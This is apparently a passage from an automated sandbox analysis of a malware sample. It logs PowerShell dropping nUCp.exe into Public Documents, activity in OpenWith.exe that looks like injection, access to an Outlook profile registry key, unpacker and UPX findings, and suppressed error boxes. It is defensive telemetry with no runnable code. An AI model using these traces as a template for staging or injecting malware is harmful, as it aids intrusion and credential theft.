Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Documents\nUCp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Documents\nUCp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Windows\SysWOW64\OpenWith.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb> source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1401134083.00000177EE833000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: nUCp.exe, 00000004.00000003.1391779587.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391701123.0000000000E50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394843323.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394938485.0000000004ED0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: nUCp.exe, 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: nUCp.exe, 00000004.00000003.1390959056.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391125502.0000000004730000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1393989753.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394224065.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: nUCp.exe, 00000004.00000003.1391365646.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391513023.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394664846.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394483982.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: nUCp.exe, 00000004.00000003.1390959056.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391125502.0000000004730000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1393989753.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394224065.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: nUCp.exe, 00000004.00000003.1391365646.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391513023.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394664846.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394483982.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb4-Xz source: OpenWith.exe, 00000006.00000003.1538253921.0000011F7B75D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb^ source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb9 source: powershell.exe, 00000000.00000002.1401134083.00000177EE833000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: nUCp.exe, 00000004.00000003.1391779587.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391701123.0000000000E50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394843323.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394938485.0000000004ED0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: nUCp.exe, 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: OpenWith.exe, 00000006.00000003.1538253921.0000011F7B75D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 6.3.OpenWith.exe.11f7b45d970.2.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.3.OpenWith.exe.11f7b45d970.2.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 6.3.OpenWith.exe.11f7b45d970.0.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.3.OpenWith.exe.11f7b45d970.0.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 6.3.OpenWith.exe.11f7b45d970.5.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.3.OpenWith.exe.11f7b45d970.5.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 6.2.OpenWith.exe.11f7b459d60.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.2.OpenWith.exe.11f7b459d60.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 6.3.OpenWith.exe.11f7b459d60.3.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.3.OpenWith.exe.11f7b459d60.3.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 6.3.OpenWith.exe.11f7b45d970.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.3.OpenWith.exe.11f7b45d970.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 6.3.OpenWith.exe.11f7b45d970.4.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 6.3.OpenWith.exe.11f7b45d970.4.raw.unpack, Runtime.cs	.Net Code: CoreMain

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0CC815D push ebx; ret	0_2_00007FF7C0CC816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0CC126D pushad ; retf	0_2_00007FF7C0CC1272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0CC6C00 push eax; ret	0_2_00007FF7C0CC6C0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0CC5CBD push eax; iretd	0_2_00007FF7C0CC5D21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0D90566 push esi; retf	0_2_00007FF7C0D90567
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01004130 pushad ; ret	4_3_01004138
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01002F50 push eax; retf	4_3_01002F51
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01004170 push ecx; iretd	4_3_0100417C
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01006777 push esi; ret	4_3_01006782
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_010047A2 push ebp; iretd	4_3_010047A3
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_010061E2 push eax; retf	4_3_010061F1
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01004C62 push es; retf	4_3_01004C91
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01005E69 push ebx; iretd	4_3_01005E6A
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01006A80 push edx; ret	4_3_01006A81
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_00FAC01A push ds; iretd	4_2_00FAC036
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_010012F4 push ecx; ret	4_2_01001307
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_00FA1436 push ds; retf	4_2_00FA143B
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_00FAE5F8 push ebx; ret	4_2_00FAE5F9
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F4262 push eax; retf	5_3_027F4271
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F2822 push ebp; iretd	5_3_027F2823
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F3EE9 push ebx; iretd	5_3_027F3EEA
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F2CE2 push es; retf	5_3_027F2D11
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F4B00 push edx; ret	5_3_027F4B01
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F47F7 push esi; ret	5_3_027F4802
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F21F0 push ecx; iretd	5_3_027F21FC
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F0FD0 push eax; retf	5_3_027F0FD1
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F21B0 pushad ; ret	5_3_027F21B8
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4E3590 push ebx; retf	9_2_0000022FAA4E3592

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Documents\nUCp.mp3			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Documents\nUCp.exe (copy)			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\nUCp.mp3

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nUCp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
